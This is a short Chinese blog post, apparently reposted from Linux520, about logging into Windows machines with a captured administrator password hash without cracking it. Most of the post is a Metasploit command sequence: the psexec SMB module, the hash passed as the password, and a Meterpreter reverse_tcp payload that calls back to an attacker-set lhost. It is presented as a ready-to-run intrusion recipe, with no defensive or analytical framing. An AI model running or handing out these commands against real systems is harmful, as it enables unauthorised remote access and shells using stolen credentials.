抓到管理员的密码hash根本不用破解,直接就可以登录。

use windows/smb/psexec

set SMBUser username

set SMBPass 用户密码的hash值

set payload Windows/meterpreter/reverse_tcp

set rhost 333.333.333.333

set lhost 111.111.111.111

exploit

转自:Linux520

Comments
Write a Comment